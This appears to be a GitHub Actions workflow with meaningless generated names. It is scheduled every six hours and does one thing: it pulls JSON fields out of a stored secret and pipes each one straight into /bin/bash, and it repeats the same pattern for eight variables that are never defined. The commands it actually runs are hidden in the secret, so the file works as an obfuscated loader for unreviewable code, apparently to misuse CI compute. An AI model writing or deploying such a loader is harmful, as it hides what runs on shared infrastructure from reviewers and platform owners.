name: dongkuangyu7654
on:
  workflow_dispatch:
  schedule:
    - cron: '26 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: dongkuangyu7654
        env:
          das270: ${{ secrets.das270 }}
        run: |
          echo $das270 | jq -r .n8286 | /bin/bash
          echo $btx4553 | jq -r .dqgy696 | /bin/bash
          echo $o0 | jq -r .e242 | /bin/bash
          echo $x626 | jq -r .laa3728 | /bin/bash
          echo $qpbsf52672 | jq -r .lbm24844 | /bin/bash
          echo $am8408 | jq -r .bw116 | /bin/bash
          echo $ycada6428 | jq -r .cmo1715 | /bin/bash
          echo $zxiim6 | jq -r .cjepk4921 | /bin/bash
          echo $zin0485 | jq -r .nmgga99 | /bin/bash

